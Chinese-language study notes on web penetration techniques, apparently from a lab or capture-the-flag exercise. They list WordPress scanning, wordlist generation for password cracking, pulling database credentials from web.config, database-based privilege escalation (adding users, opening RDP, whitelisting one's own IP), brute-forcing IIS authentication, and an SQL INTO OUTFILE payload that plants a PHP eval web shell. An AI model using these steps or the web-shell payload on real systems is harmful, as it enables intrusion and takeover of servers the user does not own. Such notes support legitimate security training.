知识点总结

　　碰到wordpress 框架的  使用 kalilinux 里面的wpscan进行扫描

　　cewl kali自带的密码生成工具

　　Cewl介绍:
.
　　cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个单词列表，这个列表可以扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行工具应用FAB，它使用相同的元数据提取技术从已下载的列表中创建作者/创建者列表。

　　web.config 保存着数据库的信息

　　数据库提权：

　　创建用户 添加用户到用户组

　　开启3389端口

　　开启防火墙白名单 把自己的ip放进去

　　也可以更改administrator的密码

　　九头蛇和美杜莎 可以进行IIS的认证爆破

　　当http头出现

　　Authorization: Basic MTE6MTE=

　　则说明有IIS认证，用蚁剑连接的时候也需要进行base64编码 同时加入Authorization: Basic MTE6MTE=

　　数据库getshell

　　select  "<?php eval($_post['cmd']);?>" into outfile "文件路径/1.php"